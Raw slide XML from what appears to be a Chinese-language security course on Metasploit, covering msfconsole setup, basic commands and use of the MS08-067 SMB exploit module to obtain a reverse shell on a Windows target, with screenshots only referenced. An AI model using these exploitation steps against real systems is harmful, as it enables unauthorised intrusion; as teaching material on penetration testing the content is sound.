              <a:t>图5-4 打开5432端口打开状态</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180877"/>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752600"/>
            <a:ext cx="1058799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(1)Msfconsole启动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使用命令systemctl enable postgresql.service，设置服务开机自启，看服务开机自启动状态，如图5-5所示。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3303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4010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47752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7" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3352800"/>
            <a:ext cx="8018145" cy="2019935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="5638800"/>
            <a:ext cx="3331845" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-5 查看服务开机自启动状态</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180877"/>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752600"/>
            <a:ext cx="4548505"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(1)Msfconsole启动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管理数据库就不做演示了，感兴趣的可以自行操作，如图5-6所示。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3303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4010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47752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0" name="图片 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="990600"/>
            <a:ext cx="3375660" cy="4679315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="5791200"/>
            <a:ext cx="3150870" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-6 管理数据库</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180877"/>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990600" y="1579245"/>
            <a:ext cx="1199261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①　最流行的用户接口，几乎可以使用全部MSF功能，控制台命令支持TAB自动补全；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②　支持外部命令的执行（系统命令等）。如图5-7所示。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47752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1" name="图片 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="3124200"/>
            <a:ext cx="5186680" cy="2987040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="6224270"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-7 Msfconsole接口</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219200"/>
            <a:ext cx="1199261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启动msfconsole,命令:msfconsole，如图5-8所示。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6" name="图片 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="2286000"/>
            <a:ext cx="5805805" cy="3794760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="6209030"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-8 启动msfconsole</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219200"/>
            <a:ext cx="1199261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想要更换默认图像的可以直接输入banner换个图形，如图5-9所示。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5" name="图片 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2324100"/>
            <a:ext cx="4033520" cy="3924300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="6337300"/>
            <a:ext cx="3332480" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-9 更换msfconsole启动图形</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8" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="70485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9" name="AutoShape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="38100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2066925" y="542925"/>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Freeform 61"/>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Freeform 63"/>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5" name="Freeform 65"/>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158115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7" name="AutoShape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158115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58115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Freeform 69"/>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0" name="AutoShape 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350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1" name="AutoShape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350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33350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Freeform 73"/>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4" name="AutoShape 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950"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5" name="AutoShape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950"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23950"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Freeform 77"/>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8" name="Freeform 78"/>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Freeform 79"/>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0" name="Freeform 80"/>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Freeform 81"/>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2" name="AutoShape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63817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63817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AutoShape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63817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5" name="Freeform 85"/>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39052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39052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AutoShape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="39052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9" name="Freeform 89"/>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90" name="Freeform 90"/>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1" name="Freeform 91"/>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2" name="Freeform 92"/>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Freeform 93"/>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4" name="Freeform 94"/>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5" name="Freeform 95"/>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6" name="Freeform 96"/>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Freeform 97"/>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98" name="Freeform 98"/>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9" name="Freeform 99"/>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0" name="Freeform 100"/>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1" name="Freeform 101"/>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2" name="Freeform 102"/>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3" name="Freeform 103"/>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04" name="TextBox 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251834" y="2430462"/>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5" name="Freeform 105"/>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6" name="Freeform 106"/>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7" name="Freeform 107"/>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8" name="Freeform 108"/>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9" name="Freeform 109"/>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0" name="Freeform 110"/>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1" name="Freeform 111"/>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2" name="Freeform 112"/>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3" name="Freeform 113"/>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4" name="Freeform 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="24384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15" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2514600"/>
            <a:ext cx="17811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项目导入</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16" name="AutoShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4464526" y="24192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7" name="TextBox 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4631054" y="2494597"/>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8" name="AutoShape 11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9" name="Freeform 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="32766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0" name="TextBox 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3352800"/>
            <a:ext cx="28860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知识储备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1" name="AutoShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4464526" y="32574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2" name="TextBox 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4631054" y="33327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2</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3" name="Freeform 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973955" y="40767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24" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="4114800"/>
            <a:ext cx="1781175" cy="311182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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任务实施</a:t>
            </a:r>
            <a:endPar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5" name="AutoShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409281" y="40575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26" name="TextBox 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4575809" y="4132897"/>
            <a:ext cx="176530" cy="334645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>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3</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7" name="Freeform 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973955" y="49149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28" name="TextBox 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="4982845"/>
            <a:ext cx="2886075" cy="311182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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项目小结</a:t>
            </a:r>
            <a:endPar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9" name="AutoShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409281" y="48957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0" name="TextBox 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4575809" y="497109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4</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219200"/>
            <a:ext cx="1199261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输入help查看命令信息，内容过多，大家可以自己去查看。</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输入connect然后回车，会展示命令选项用法，如图5-10所示。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8" name="图片 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2819400"/>
            <a:ext cx="6903085" cy="3006725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="6019800"/>
            <a:ext cx="2501265" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-10 命令选项用法</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219200"/>
            <a:ext cx="1199261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show命令比较强大，但是也比较慢，因为显示东西多，如图5-11所示。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2" name="图片 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2362200"/>
            <a:ext cx="9888855" cy="1285240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3816350"/>
            <a:ext cx="3118485" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-11 show命令用法</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219200"/>
            <a:ext cx="1199261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还有search也是很强大的功能，大家可以自行查看。</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这里进行简单使用查找并使用模块use命令，如图5-12所示。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6" name="图片 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2515870" y="2743200"/>
            <a:ext cx="7160895" cy="2136775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="5105400"/>
            <a:ext cx="3065780" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-12 模块use命令用法</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219200"/>
            <a:ext cx="1199261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exploit/windows/smb/ms08_067_netapi的含义：</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exploit：代表攻击模块 ； windows：代表平台 ；  smb：代表应用协议。</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用use使用一个模块后，可以使用 show options查看我们需要配置的选项，</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①　使用showtaraets选择目标主机系统；</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②　使用showpayloads选择 payload；</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③　使用showadvanced查看高级参数；</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④　使用 showevasion查看用来做混淆、逃避的模块。</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set/setg:设置参数，比如要渗透的主机IP、payload等。我们可以用showmissing查看没</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有设置的参数;setg是设置全局变量，避免每个模块都要输入相同的参数。</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219200"/>
            <a:ext cx="1199261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①　unset/unsetg:取消设置参数。unsetg是取消设置的全局变量；</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②　save:设置的参数在下一次启动的时候不会生效，可以用save保存我们使用过程的设置；/root/msf4/config cat到文件进行查看；</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③　check:检查目标是否真的存在这个漏洞，大部分模块没有check功能；</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④　run/exploit:攻击；</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⑤　jobs/kill:杀死进程；</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⑥　session:建立会话。如图5-13所示。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8" name="图片 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="1981200"/>
            <a:ext cx="6315710" cy="3326765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="5486400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-13 exploit/windows/smb/ms08_067_netapi含义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838200" y="1331595"/>
            <a:ext cx="4520565"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还有很多选项可以自行调配，端口及IP均可修改，由目标实际情况而定。</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使用show targets显示能攻击的目标系统。这些都是能攻击的目标主机系统，图片太长，只做部分展示，可自行查看，如图5-14所示。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4" name="图片 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="1143000"/>
            <a:ext cx="4887595" cy="4774565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="6127750"/>
            <a:ext cx="4910455" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-14 使用show targets显示能攻击的目标系统</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838200" y="1331595"/>
            <a:ext cx="11059160"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①　获得目标系统类型后，找出目标，将相同系统序列号设为目标系统，如图5-15所示。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4" name="图片 15"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2438400"/>
            <a:ext cx="6015355" cy="3026410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3664585" y="5638800"/>
            <a:ext cx="5121275" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-15 将相同系统序列号设为目标系统</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513715" y="1331595"/>
            <a:ext cx="11518265"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②攻击完成之后要去获得对方shell去执行payload，还是使用search去找，规则类似，如图5-16所示。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2" name="图片 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368040" y="2391410"/>
            <a:ext cx="5455920" cy="4056380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="6447790"/>
            <a:ext cx="5005705" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-16 使用search去查找</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160145" y="1371600"/>
            <a:ext cx="10546715" cy="2410460"/>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③　然后选择想要的shell，如图5-17所示。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6" name="图片 17" descr="4b191a4e54414f92b61961a825e0bd21"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933700" y="2514600"/>
            <a:ext cx="7557770" cy="770255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="3429000"/>
            <a:ext cx="2540635" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-17 获得对方shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276350" y="3679190"/>
            <a:ext cx="10200640" cy="553085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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④ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </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然后exploit，没成功的原因是系统类型不对，无法针对开展攻击，如图5-18所示。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28" name="图片 18" descr="e4468a6506864514adc6f3311cd38c7d"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="4419600"/>
            <a:ext cx="7550785" cy="1083945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="5702300"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-18 使用exploit</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160145" y="1447800"/>
            <a:ext cx="10546715"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附上成功的图，成功会创建一个shell，这个是反弹shell,不是交互式shell，如图5-19所示。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9" name="图片 19"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3583940" y="2667000"/>
            <a:ext cx="5435600" cy="2457450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5257800"/>
            <a:ext cx="2955925" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-19 成功会创建一个shell</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0" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
